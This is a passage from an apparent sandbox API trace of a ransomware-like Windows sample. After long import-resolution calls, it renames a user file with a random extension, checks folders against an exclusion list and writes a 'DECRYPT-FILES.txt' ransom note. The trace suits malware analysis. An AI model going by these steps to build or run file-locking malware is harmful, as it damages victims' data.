lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.740] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.740] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.740] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.740] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.740] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.740] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.740] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.740] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.740] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.740] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.740] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.740] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.740] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.740] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.740] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.741] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.741] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.741] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.741] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.741] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.741] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.741] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.741] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.741] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.741] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.741] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.741] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.741] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.741] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.741] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.741] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.741] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.742] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.742] lstrlenA (lpString="DELETEATOM") returned 10 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.742] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.742] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.742] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.742] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.742] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.742] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.742] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.742] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.742] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.742] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.742] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.742] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.742] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.742] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.742] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.742] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.743] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.743] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.743] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.743] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.743] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.743] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.743] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.743] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.743] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.743] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.743] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.743] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.743] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.743] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.743] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.743] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.743] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.743] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.744] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.744] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.744] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.744] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.744] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.744] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.744] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.744] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png") returned 62 [0076.744] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png.4TSn") returned 67 [0076.744] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9hyc b9 oagc.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png.4TSn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9hyc b9 oagc.png.4tsn"), dwFlags=0x0) returned 1 [0076.745] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.745] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.745] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.746] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0076.746] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0076.746] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0076.746] lstrcatW (in: lpString1="Adobe", lpString2="\\" | out: lpString1="Adobe\\") returned="Adobe\\" [0076.746] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Adobe\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\" [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Program Files") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch=":\\Windows") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Games\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\All Users") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="AhnLab") returned 0x0 [0076.746] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.746] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0076.746] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.746] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\jkbimi8.tmp") returned 64 [0076.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0076.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0076.751] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.751] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\DECRYPT-FILES.txt") returned 70 [0076.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0076.751] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0076.752] CloseHandle (hObject=0x444) returned 1 [0076.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0076.753] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*" [0076.753] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0076.753] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.753] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.753] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.753] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.753] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0076.753] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0076.753] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0076.753] lstrcatW (in: lpString1="Acrobat", lpString2="\\" | out: lpString1="Acrobat\\") returned="Acrobat\\" [0076.753] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Acrobat\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\" [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Program Files") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch=":\\Windows") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Games\\") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Low\\Content.IE5\\") returned 